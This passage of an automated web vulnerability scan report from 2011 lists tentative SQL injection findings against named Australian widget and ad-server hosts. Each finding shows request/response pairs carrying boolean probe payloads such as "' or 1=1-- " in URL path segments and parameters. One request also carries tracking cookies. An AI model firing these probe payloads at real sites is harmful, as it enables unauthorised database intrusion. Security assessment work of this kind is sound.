User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 02 May 2011 12:45:34 GMT
Connection: close
Content-Length: 233

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /widgets/multiwidget3/TA/FM-NEWS
on this server.</p>
</body></html>

Request 2

GET /widgets/multiwidget3/TA/FM-NEWS?131488663%20or%201%3d2--%20=1 HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://www.theage.com.au/national/christmas-island-action-adds-to-villawood-woes-20110425-1du6x.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 02 May 2011 11:50:25 GMT
ETag: "17c8024-17eeb-a10ae240"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: text/html
Date: Mon, 02 May 2011 12:45:34 GMT
Connection: close
Content-Length: 98027

<!DOCTYPE html>
<html lang="en">
<head>
   <meta charset="utf-8" />
   <title></title>
   <style type="text/css">
   /*********************** * * Eric Meyer reset 15 Jan 2008 * ***********************/ html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, big, cite, code, del, dfn, em, font, img, ins, kbd, q, s, samp, small, strike, strong, sub, sup, tt, var, b, u, i, center, dl, dt, dd, ol, ul, li, fieldset, form, label, legend, table, caption, tbody, tfoot, thead, tr, th, td {margin: 0; padding: 0; border: 0; outline: 0; font-size: 100%; vertical-align: baseline; background: transparent}
body {line-height: 1}
ol, ul {list-style: none}
blockquote, q {quotes: none}
/* remember to define focus styles! */ :focus {outline: 0}
/* remember to highlight inserts somehow! */ ins {text-decoration: none}
del {text-decoration: line-through}
/* tables still need 'cellspacing="0"' in the markup */ table {border-collapse: collapse; border-spacing: 0}
/* ** ** Multi-widget styles ** */ #multiwidget {width:300px;background:#fff;font-family:helvetica;margin:0px auto;text-align:center;}
h1 {padding:5px;margin:0;color:#333;font-size:18px;background-color:#c5e60e;color:#555;}
.curve-tr-25 {-webkit-border-top-right-radius:25px;-moz-border-radius-topright:25px;border-top-right-radius:25px;}
#activity-indicator {margin:100px 0 0 0;}
h4 {width:74px;height:28px;background-color:#cc3000;color:#fff;font-size:12px;}
h3 {height:25px;display:block;}
h3 a {display:block;height:15px;width:80px;background: transparent url(/images/sprite-png-domainwidget.png) no-repeat -150px -60px;float:right;text-indent:-999em;}
ul.tabs {margin:0;padding:0;overflow:hidden;background-color:#c5e60e;}
ul.tabs li {
...[SNIP]...

1.20. http://mozo-widgets.f2.com.au/widgets/multiwidget3/WAT/FM-NEWS [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://mozo-widgets.f2.com.au
Path:   /widgets/multiwidget3/WAT/FM-NEWS

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 16009845'%20or%201%3d1--%20 and 16009845'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /widgets16009845'%20or%201%3d1--%20/multiwidget3/WAT/FM-NEWS HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://www.watoday.com.au/wa-news/hunger-strike-starts-on-christmas-island-20110427-1dw45.html?from=smh_ft
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 02 May 2011 12:46:41 GMT
Connection: close
Content-Length: 253

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /widgets16009845' or 1=1-- /multiwidget3/WAT/FM-NEWS
on this server.</p>
</body></html>

Request 2

GET /widgets16009845'%20or%201%3d2--%20/multiwidget3/WAT/FM-NEWS HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://www.watoday.com.au/wa-news/hunger-strike-starts-on-christmas-island-20110427-1dw45.html?from=smh_ft
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
X-Runtime: 0.02570
Status: 404
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Date: Mon, 02 May 2011 12:46:42 GMT
Connection: close
Content-Length: 36120

<!DOCTYPE html>
<html lang="en">
<head>
   <meta charset="utf-8" />
   <meta name="keywords" content="Mozo, money info zone, information, bank reviews"/><meta name="description" content="Find products by provider with Mozo. Read reviews about providers, or write your own review about provider."/><title>Mozo - Compare Credit Cards, Home Loans, Term Deposits and more</title>
   <meta name="robots" content="noydir" />
   <meta name="robots" content="noodp" />
       <link rel="canonical" href="http://mozo.com.au/widgets16009845' or 1=2-- /multiwidget3/WAT/FM-NEWS">
   
   <script type="text/javascript">
           var logged_in = false;
           var searchType = '';
       //var providerNames; // = [];
   </script>

   

   
   <script src="/javascripts/base_8604.js?1304318891" type="text/javascript"></script>    


   
   
   <link href="/stylesheets/base_8603.css" media="screen" rel="Stylesheet" type="text/css" />
   
   
   <link rel="shortcut icon" href="/favicon.icon" type="image/vnd.microsoft.icon"/>
   <link rel="icon" href="/image/favicon.png" type="image/png"/>
   <!--[if IE 6]>
   <link rel="stylesheet" media="screen" href="/stylesheets/mozo-ie6.css" />
   <![endif]-->
   <!--[if IE 7]>
   <link rel="stylesheet" media="screen" href="/stylesheets/mozo-ie7.css" />
   <![endif]-->
   <!--[if IE 8]>
   <link rel="stylesheet" media="screen" href="/stylesheets/mozo-ie8.css" />
   <![endif]-->
   <link href="/stylesheets/radius.css?1304318891" media="screen" rel="stylesheet" type="text/css" />
   <!--<link rel="stylesheet" media="screen" href="/stylesheets/radius.css" />-->

   <script type="text/javascript">
       var domainContext = 'mozo';
       var wallet = [['credit_cards', [], []], ['debit_cards', [], []], ['personal_loans', [], []], ['car_loans', [], []], ['h
...[SNIP]...

1.21. http://mozo-widgets.f2.com.au/widgets/multiwidget3/WAT/FM-NEWS [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://mozo-widgets.f2.com.au
Path:   /widgets/multiwidget3/WAT/FM-NEWS

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 80339781'%20or%201%3d1--%20 and 80339781'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /widgets/multiwidget380339781'%20or%201%3d1--%20/WAT/FM-NEWS HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://www.watoday.com.au/wa-news/hunger-strike-starts-on-christmas-island-20110427-1dw45.html?from=smh_ft
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 02 May 2011 12:46:58 GMT
Connection: close
Content-Length: 253

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /widgets/multiwidget380339781' or 1=1-- /WAT/FM-NEWS
on this server.</p>
</body></html>

Request 2

GET /widgets/multiwidget380339781'%20or%201%3d2--%20/WAT/FM-NEWS HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://www.watoday.com.au/wa-news/hunger-strike-starts-on-christmas-island-20110427-1dw45.html?from=smh_ft
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
Status: 404
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Date: Mon, 02 May 2011 12:46:59 GMT
Connection: close
Content-Length: 36120

<!DOCTYPE html>
<html lang="en">
<head>
   <meta charset="utf-8" />
   <meta name="keywords" content="Mozo, money info zone, information, bank reviews"/><meta name="description" content="Find products by provider with Mozo. Read reviews about providers, or write your own review about provider."/><title>Mozo - Compare Credit Cards, Home Loans, Term Deposits and more</title>
   <meta name="robots" content="noydir" />
   <meta name="robots" content="noodp" />
       <link rel="canonical" href="http://mozo.com.au/widgets/multiwidget380339781' or 1=2-- /WAT/FM-NEWS">
   
   <script type="text/javascript">
           var logged_in = false;
           var searchType = '';
       //var providerNames; // = [];
   </script>

   

   
   <script src="/javascripts/base_8604.js?1304318891" type="text/javascript"></script>    


   
   
   <link href="/stylesheets/base_8603.css" media="screen" rel="Stylesheet" type="text/css" />
   
   
   <link rel="shortcut icon" href="/favicon.icon" type="image/vnd.microsoft.icon"/>
   <link rel="icon" href="/image/favicon.png" type="image/png"/>
   <!--[if IE 6]>
   <link rel="stylesheet" media="screen" href="/stylesheets/mozo-ie6.css" />
   <![endif]-->
   <!--[if IE 7]>
   <link rel="stylesheet" media="screen" href="/stylesheets/mozo-ie7.css" />
   <![endif]-->
   <!--[if IE 8]>
   <link rel="stylesheet" media="screen" href="/stylesheets/mozo-ie8.css" />
   <![endif]-->
   <link href="/stylesheets/radius.css?1304318891" media="screen" rel="stylesheet" type="text/css" />
   <!--<link rel="stylesheet" media="screen" href="/stylesheets/radius.css" />-->

   <script type="text/javascript">
       var domainContext = 'mozo';
       var wallet = [['credit_cards', [], []], ['debit_cards', [], []], ['personal_loans', [], []], ['car_loans', [], []], ['home_loans', [], []],
...[SNIP]...

1.22. http://mozo-widgets.f2.com.au/widgets/multiwidget3/WAT/FM-NEWS [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://mozo-widgets.f2.com.au
Path:   /widgets/multiwidget3/WAT/FM-NEWS

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 12878514'%20or%201%3d1--%20 and 12878514'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /widgets/multiwidget3/WAT12878514'%20or%201%3d1--%20/FM-NEWS HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://www.watoday.com.au/wa-news/hunger-strike-starts-on-christmas-island-20110427-1dw45.html?from=smh_ft
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 02 May 2011 12:47:12 GMT
Connection: close
Content-Length: 253

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /widgets/multiwidget3/WAT12878514' or 1=1-- /FM-NEWS
on this server.</p>
</body></html>

Request 2

GET /widgets/multiwidget3/WAT12878514'%20or%201%3d2--%20/FM-NEWS HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://www.watoday.com.au/wa-news/hunger-strike-starts-on-christmas-island-20110427-1dw45.html?from=smh_ft
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
X-Runtime: 0.04091
ETag: "c75d435ba4c28ba01dac0272b2847b01"
Status: 200 OK
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Cache-Control: private, must-revalidate, max-age=0
Date: Mon, 02 May 2011 12:47:12 GMT
Connection: close
Content-Length: 98258

<!DOCTYPE html>
<html lang="en">
<head>
   <meta charset="utf-8" />
   <title></title>
   <style type="text/css">
   /*********************** * * Eric Meyer reset 15 Jan 2008 * ***********************/ html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, big, cite, code, del, dfn, em, font, img, ins, kbd, q, s, samp, small, strike, strong, sub, sup, tt, var, b, u, i, center, dl, dt, dd, ol, ul, li, fieldset, form, label, legend, table, caption, tbody, tfoot, thead, tr, th, td {margin: 0; padding: 0; border: 0; outline: 0; font-size: 100%; vertical-align: baseline; background: transparent}
body {line-height: 1}
ol, ul {list-style: none}
blockquote, q {quotes: none}
/* remember to define focus styles! */ :focus {outline: 0}
/* remember to highlight inserts somehow! */ ins {text-decoration: none}
del {text-decoration: line-through}
/* tables still need 'cellspacing="0"' in the markup */ table {border-collapse: collapse; border-spacing: 0}
/* ** ** Multi-widget styles ** */ #multiwidget {width:300px;background:#fff;font-family:helvetica;margin:0px auto;text-align:center;}
h1 {padding:5px;margin:0;color:#333;font-size:18px;background-color:#c5e60e;color:#555;}
.curve-tr-25 {-webkit-border-top-right-radius:25px;-moz-border-radius-topright:25px;border-top-right-radius:25px;}
#activity-indicator {margin:100px 0 0 0;}
h4 {width:74px;height:28px;background-color:#cc3000;color:#fff;font-size:12px;}
h3 {height:25px;display:block;}
h3 a {display:block;height:15px;width:80px;background: transparent url(/images/sprite-png-domainwidget.png) no-repeat -150px -60px;float:righ
...[SNIP]...

1.23. http://mozo-widgets.f2.com.au/widgets/multiwidget3/WAT/FM-NEWS [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://mozo-widgets.f2.com.au
Path:   /widgets/multiwidget3/WAT/FM-NEWS

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 67737725'%20or%201%3d1--%20 and 67737725'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /widgets/multiwidget3/WAT/FM-NEWS67737725'%20or%201%3d1--%20 HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://www.watoday.com.au/wa-news/hunger-strike-starts-on-christmas-island-20110427-1dw45.html?from=smh_ft
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 02 May 2011 12:47:32 GMT
Connection: close
Content-Length: 253

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /widgets/multiwidget3/WAT/FM-NEWS67737725' or 1=1--
on this server.</p>
</body></html>

Request 2

GET /widgets/multiwidget3/WAT/FM-NEWS67737725'%20or%201%3d2--%20 HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://www.watoday.com.au/wa-news/hunger-strike-starts-on-christmas-island-20110427-1dw45.html?from=smh_ft
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 500 Internal Server Error
Server: Apache
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
Status: 500
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Date: Mon, 02 May 2011 12:47:33 GMT
Connection: close
Content-Length: 75451

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<script type="text/javascript">
if (((document.domain.indexOf("smh.com.au") != -1) || (document.domain.indexOf("theage.com.au") != -1) ||
(document.domain.indexOf("watoday.com.au") != -1) ||
(document.domain.indexOf("brisbanetimes.com.au") != -1) ||
(document.domain.indexOf("businessday.com.au") != -1)) && (isSmartPhone()) &&
(document.cookie.indexOf("iphone_redirect=false") == -1)) {
var currentLocation = document.location.href;
if (currentLocation.indexOf("www.") != -1) {
currentLocation = currentLocation.replace("www.", "m.");
window.location = currentLocation;
}
}

/**
* Returns a <code>Boolean</code> indicating whether or not the user agent represents a smart phone.
*
* @return True if the user agent represents a smart phone; otherwise false.
*/
function isSmartPhone() {
var userAgent = navigator.userAgent
return ((matchesSmartPhoneUserAgentRegularExpressions(userAgent)) &&
(!matchesTabletUserAgentRegularExpressions(userAgent)));
}

/**
* Returns a <code>Boolean</code> indicating whether or not the specified user agent represents a smart phone.
* If any of the regular expressions are updated then they should be updated in
* <code>SmartPhoneHelper.java</code>.

...[SNIP]...

1.24. http://mozo-widgets.f2.com.au/widgets/multiwidget3/WAT/FM-NEWS [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://mozo-widgets.f2.com.au
Path:   /widgets/multiwidget3/WAT/FM-NEWS

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 99435588%20or%201%3d1--%20 and 99435588%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /widgets/multiwidget3/WAT/FM-NEWS?199435588%20or%201%3d1--%20=1 HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://www.watoday.com.au/wa-news/hunger-strike-starts-on-christmas-island-20110427-1dw45.html?from=smh_ft
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 02 May 2011 12:46:23 GMT
Connection: close
Content-Length: 234

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /widgets/multiwidget3/WAT/FM-NEWS
on this server.</p>
</body></html>

Request 2

GET /widgets/multiwidget3/WAT/FM-NEWS?199435588%20or%201%3d2--%20=1 HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://www.watoday.com.au/wa-news/hunger-strike-starts-on-christmas-island-20110427-1dw45.html?from=smh_ft
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 02 May 2011 11:51:26 GMT
ETag: "17c809e-17efa-a4adab80"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: text/html
Date: Mon, 02 May 2011 12:46:24 GMT
Connection: close
Content-Length: 98042

<!DOCTYPE html>
<html lang="en">
<head>
   <meta charset="utf-8" />
   <title></title>
   <style type="text/css">
   /*********************** * * Eric Meyer reset 15 Jan 2008 * ***********************/ html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, big, cite, code, del, dfn, em, font, img, ins, kbd, q, s, samp, small, strike, strong, sub, sup, tt, var, b, u, i, center, dl, dt, dd, ol, ul, li, fieldset, form, label, legend, table, caption, tbody, tfoot, thead, tr, th, td {margin: 0; padding: 0; border: 0; outline: 0; font-size: 100%; vertical-align: baseline; background: transparent}
body {line-height: 1}
ol, ul {list-style: none}
blockquote, q {quotes: none}
/* remember to define focus styles! */ :focus {outline: 0}
/* remember to highlight inserts somehow! */ ins {text-decoration: none}
del {text-decoration: line-through}
/* tables still need 'cellspacing="0"' in the markup */ table {border-collapse: collapse; border-spacing: 0}
/* ** ** Multi-widget styles ** */ #multiwidget {width:300px;background:#fff;font-family:helvetica;margin:0px auto;text-align:center;}
h1 {padding:5px;margin:0;color:#333;font-size:18px;background-color:#c5e60e;color:#555;}
.curve-tr-25 {-webkit-border-top-right-radius:25px;-moz-border-radius-topright:25px;border-top-right-radius:25px;}
#activity-indicator {margin:100px 0 0 0;}
h4 {width:74px;height:28px;background-color:#cc3000;color:#fff;font-size:12px;}
h3 {height:25px;display:block;}
h3 a {display:block;height:15px;width:80px;background: transparent url(/images/sprite-png-domainwidget.png) no-repeat -150px -60px;float:right;text-indent:-999em;}
ul.tabs {margin:0;padding:0;overflow:hidden;background-color:#c5e60e;}
ul.tabs li {
...[SNIP]...

1.25. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.js [keyword parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7856/12590/22893-15.js

Issue detail

The keyword parameter appears to be vulnerable to SQL injection attacks. The payloads 18878509'%20or%201%3d1--%20 and 18878509'%20or%201%3d2--%20 were each submitted in the keyword parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /a/7856/12590/22893-15.js?cb=0.5460146523546427&rf=http%3A//www.brisbanetimes.com.au/opinion/politics/blogs/gengreens/temporary-protection-visas-are-not-the-answer-20110427-1dwe3.html&keyword=bt/news_home18878509'%20or%201%3d1--%20 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2132=978972DFA063000D2C0E7A380BFA1DEC; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; khaos=GMMM8SST-B-HSA1; lm="21 Apr 2011 23:56:48 GMT"; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_1986=2724386019227846218; cd=false; put_2100=usr3fd49cb9a7122f52; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%266286%3D1%264210%3D1%265852%3D1%264214%3D1%262372%3D1%263811%3D1%262374%3D1%264222%3D1%264894%3D1%266073%3D1%262939%3D1%266552%3D1%264140%3D1%264212%3D1%264554%3D1; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; ruid=154dab7990adc1d6f3372c12^4^1304340334^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses15=12590^1; csi15=3151650.js^1^1304340335^1304340335; rdk=7725/12338; rdk2=0; ses2=12338^2; csi2=3150134.js^1^1304340344^1304340344&3199967.js^1^1304340334^1304340334

Response 1

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 12:48:02 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Mon, 02-May-2011 13:48:02 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 02-May-2011 13:48:02 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=12590^2; expires=Tue, 03-May-2011 04:59:59 GMT; max-age=69117; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3151650.js^2^1304340335^1304340482; expires=Mon, 09-May-2011 12:48:02 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2350

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3151650"
...[SNIP]...
